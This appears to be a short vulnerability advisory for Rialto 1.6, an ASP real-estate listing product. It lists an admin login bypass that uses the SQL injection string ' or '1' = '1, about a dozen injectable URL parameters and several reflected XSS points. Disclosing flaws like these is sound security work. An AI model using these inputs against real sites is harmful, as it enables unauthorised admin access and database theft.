Rialto 1.6[admin login bypass & multiples injections sql]
vendor site: http://www.grandora.com/
product : Rialto 1.6
bug:multiples injection sql , login bypass , xss
risk : high !
admin login bypass :
/admin/default.asp
username: ' or '1' = '1
passwd: ' or '1' = '1
injection sql :
/listfull.asp?ID='[sql]
/listmain.asp?cat='[sql]
/printmain.asp?ID='[sql]
/searchkey.asp?Keyword='[sql]
/searchmain.asp?I1=1&area='[sql]
/searchoption.asp?I12=1&cat='[sql]
/searchmain.asp?I1=1&area=all&cat='[sql]
/searchoption.asp?I12=1&cat=all&area='[sql]
/searchkey.asp?Keyword=1&I1=1&searchin='[sql]
/searchoption.asp?I12=1&cat=all&area=all&cost1='[sql]
/searchoption.asp?I12=1&cat=all&area=all&cost1=0&cost2='[sql]
/searchoption.asp?I12=1&cat=all&area=all&cost1=0&cost2=10000&acreage1='[sql]
/searchoption.asp?I12=1&cat=all&area=all&cost1=0&cost2=10000&acreage1=0&acreage2=.5&squarefeet1='[sql]
xss get :
/listmain.asp?cat=[xss]
/searchkey.asp?Keyword=[xss]
/searchmain.asp?I1=1&area=all&cat=[xss]
/forminfo.asp?refno=[xss]
laurent gaffié & benjamin mossé
http://s-a-p.ca/
contact: saps.audit@xxxxxxxxx